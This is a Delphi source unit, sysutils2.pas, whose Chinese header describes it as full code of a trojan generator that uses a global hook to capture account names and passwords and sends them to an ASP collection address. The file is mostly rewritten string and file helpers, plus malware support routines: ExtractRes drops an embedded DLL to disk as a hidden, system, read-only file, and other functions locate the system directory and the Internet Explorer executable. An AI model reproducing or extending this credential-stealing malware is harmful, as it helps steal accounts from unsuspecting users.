sysutils2.pas

面对面 木马生成器 完整代码 程序仅提供测试学习 全局钩子查找句柄截获 使用ASP收信 收信地址明文（测试而已没加密） //本软件主要是截获账号和密码 带了个简单发信

        MOV     ESI,EAX
        MOV     EDI,EDX
        MOV     EBX,ECX
        XOR     AL,AL
        TEST    ECX,ECX
        JZ      @@1
        REPNE   SCASB
        JNE     @@1
        INC     ECX
@@1:    SUB     EBX,ECX
        MOV     EDI,ESI
        MOV     ESI,EDX
        MOV     EDX,EDI
        MOV     ECX,EBX
        SHR     ECX,2
        REP     MOVSD
        MOV     ECX,EBX
        AND     ECX,3
        REP     MOVSB
        STOSB
        MOV     EAX,EDX
        POP     EBX
        POP     ESI
        POP     EDI
end;

function StrPas(const Str: PChar): string;
begin
  Result := Str;
end;

{function Inttostr(const Int: integer): string;
var
  d, m: integer;
  A:boolean;
begin
  if Int=0 then
  begin
    result:='0';
    exit;
  end;
  result:='';
  A:= int >= 0;
  if A then m := int
  else m := -int;
  result:='';
  while m <> 0 do
  begin
    d := m mod 10;
    m := m div 10;
    Result := chr(d + 48) + Result;
  end;
  if not A then Result:='-'+Result;
end;
}

function Trim(const S: string): string;
var
  I, L: Integer;
begin
  L := Length(S);
  I := 1;
  while (I <= L) and (S[I] <= ' ') do
    Inc(I);
  if I > L then
    Result := ''
  else
  begin
    while S[L] <= ' ' do
      Dec(L);
    Result := Copy(S, I, L - I + 1);
  end;
end;

function StrIComp(const Str1, Str2: PChar): Integer; assembler;
asm
        PUSH    EDI
        PUSH    ESI
        MOV     EDI,EDX
        MOV     ESI,EAX
        MOV     ECX,0FFFFFFFFH
        XOR     EAX,EAX
        REPNE   SCASB
        NOT     ECX
        MOV     EDI,EDX
        XOR     EDX,EDX
@@1:    REPE    CMPSB
        JE      @@4
        MOV     AL,[ESI-1]
        CMP     AL,'a'
        JB      @@2
        CMP     AL,'z'
        JA      @@2
        SUB     AL,20H
@@2:    MOV     DL,[EDI-1]
        CMP     DL,'a'
        JB      @@3
        CMP     DL,'z'
        JA      @@3
        SUB     DL,20H
@@3:    SUB     EAX,EDX
        JE      @@1
@@4:    POP     ESI
        POP     EDI
end;

function FileAge(const FileName: string): Integer;
var
  Handle: THandle;
  FindData: TWin32FindData;
  LocalFileTime: TFileTime;
begin
  Handle := FindFirstFile(PChar(FileName), FindData);
  if Handle <> INVALID_HANDLE_VALUE then
  begin
    Windows.FindClose(Handle);
    if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then
    begin
      FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
      if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi,
        LongRec(Result).Lo) then Exit;
    end;
  end;
  Result := -1;
end;

function FileExists(const FileName: string): Boolean;
begin
  Result := FileAge(FileName) <> -1;
end;

{function FileExists(const FileName: string): Boolean;
var
  FileData: TWin32FindData;
    //当利用FindFirst和FindNext函数找到一个文件后,利用这个类型可以获得文件的属性、大小和修改时间等信息
  hFile: Cardinal;
begin
  hFile := FindFirstFile(pChar(FileName), FileData);
  if (hFile <> INVALID_HANDLE_VALUE) then
  begin
    Result := True;
    Windows.FindClose(hFile);
  end
  else
    Result := False;
end;
}

function FileOpen(const FileName: string; Mode: LongWord): Integer;
const
  AccessMode: array[0..2] of LongWord = (
    GENERIC_READ,
    GENERIC_WRITE,
    GENERIC_READ or GENERIC_WRITE);
  ShareMode: array[0..4] of LongWord = (
    0,
    0,
    FILE_SHARE_READ,
    FILE_SHARE_WRITE,
    FILE_SHARE_READ or FILE_SHARE_WRITE);
begin
  Result := -1;
  if ((Mode and 3) <= fmOpenReadWrite) and
    ((Mode and $F0) <= fmShareDenyNone) then
    Result := Integer(CreateFile(PChar(FileName), AccessMode[Mode and 3],
      ShareMode[(Mode and $F0) shr 4], nil, OPEN_EXISTING,
      FILE_ATTRIBUTE_NORMAL, 0));
end;

function FileSeek(Handle, Offset, Origin: Integer): Integer;
begin
  {$IFDEF MSWINDOWS}
  Result := SetFilePointer(THandle(Handle), Offset, nil, Origin);
  {$ENDIF}
  {$IFDEF LINUX}
  Result := __lseek(Handle, Offset, Origin);
  {$ENDIF}
end;

function FileCreate(const FileName: string): Integer;
begin
  Result := Integer(CreateFile(PChar(FileName), GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0));
end;

function FileWrite(Handle: Integer; const Buffer; Count: LongWord): Integer;
begin
  {$IFDEF MSWINDOWS}
  if not WriteFile(THandle(Handle), Buffer, Count, LongWord(Result), nil) then
    Result := -1;
  {$ENDIF}
  {$IFDEF LINUX}
  Result := __write(Handle, Buffer, Count);
  {$ENDIF}
end;

procedure FileClose(Handle: Integer);
begin
  {$IFDEF MSWINDOWS}
  CloseHandle(THandle(Handle));
  {$ENDIF}
  {$IFDEF LINUX}
  __close(Handle); // No need to unlock since all locks are released on close.
  {$ENDIF}
end;

function StrLComp(S1, S2: PChar; MaxLen: Cardinal): Integer;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, 0,
    S1, MaxLen, S2, MaxLen) - 2;
end;

function CompareText(const S1, S2: string): Integer; assembler;
asm
        PUSH    ESI
        PUSH    EDI
        PUSH    EBX
        MOV     ESI,EAX
        MOV     EDI,EDX
        OR      EAX,EAX
        JE      @@0
        MOV     EAX,[EAX-4]
@@0:    OR      EDX,EDX
        JE      @@1
        MOV     EDX,[EDX-4]
@@1:    MOV     ECX,EAX
        CMP     ECX,EDX
        JBE     @@2
        MOV     ECX,EDX
@@2:    CMP     ECX,ECX
@@3:    REPE    CMPSB
        JE      @@6
        MOV     BL,BYTE PTR [ESI-1]
        CMP     BL,'a'
        JB      @@4
        CMP     BL,'z'
        JA      @@4
        SUB     BL,20H
@@4:    MOV     BH,BYTE PTR [EDI-1]
        CMP     BH,'a'
        JB      @@5
        CMP     BH,'z'
        JA      @@5
        SUB     BH,20H
@@5:    CMP     BL,BH
        JE      @@3
        MOVZX   EAX,BL
        MOVZX   EDX,BH
@@6:    SUB     EAX,EDX
        POP     EBX
        POP     EDI
        POP     ESI
end;

function DeleteFile(const FileName: string): Boolean;
begin
{$IFDEF MSWINDOWS}
  Result := Windows.DeleteFile(PChar(FileName));
{$ENDIF}
{$IFDEF LINUX}
  Result := unlink(PChar(FileName)) <> -1;
{$ENDIF}
end;

function judgesys:integer;
var
  OS : TOSVersionInfo;
begin
  result:=0;
  OS.dwOSVersionInfoSize := sizeof(TOSVERSIONINFO);
  GetVersionEx(OS);
  case OS.dwPlatformId of
    VER_PLATFORM_WIN32s         :result:=1;
    VER_PLATFORM_WIN32_WINDOWS  :result:=2;
    VER_PLATFORM_WIN32_NT	      :result:=3;
    //VER_PLATFORM_WIN32_WINDOWSXP:result:=4;
  end;
end;

function Gesy :string;
var sysdir:array [0..255] of char;
begin
  GetsystemDirectory(sysdir,255);
  Result :=sysdir;
  if copy(Result,length(Result),1)<>'\' then
  Result:=Result+'\';
end;

function WinisNT :Bool;
var osvi:OSVERSIONINFO;
begin
  osvi.dwOSVersionInfoSize :=sizeof(osversioninfo);;
  getversionex(osvi);
  if osvi.dwPlatformId=VER_PLATFORM_WIN32_NT then
     Result:=True
  else
     Result:=False;
end;

//释放DLL函数
function ExtractRes(ResType, ResName, OutName: string): Boolean;
var
  HResInfo: THandle;
  HGlobal: THandle;
  HFile: THandle;
  Ptr: Pointer;
  Size, N: Integer;
begin
  HFile := INVALID_HANDLE_VALUE;
  repeat
    Result := False;
    HResInfo := FindResource(HInstance, PChar(ResName), PChar(ResType));
    if HResInfo = 0 then Break;
    HGlobal := LoadResource(HInstance, HResInfo);
    if HGlobal = 0 then Break;
    Ptr := LockResource(HGlobal);
    Size := SizeOfResource(HInstance, HResInfo);
    if Ptr = nil then Break;
    HFile := CreateFile(PChar(OutName), GENERIC_READ or GENERIC_WRITE,
      0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if HFile = INVALID_HANDLE_VALUE then Break;
    if WriteFile(HFile, Ptr^, Size, LongWord(N), nil) then Result := True;
  until True;
  if HFile <> INVALID_HANDLE_VALUE then CloseHandle(HFile);
  SetFileAttributes(PChar(OutName), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
end;



function IEPath: string;
var
  Path: string;
begin
  Path := Gesy;
  Delete(Path, Pos(':', Path) + 1, Length(Path));
  Path := Copy(Path, 0, Pos(':', Path));
  Path := Path + '\program files\internet explorer\iexplore.exe';
  Result := Path;
end;



end.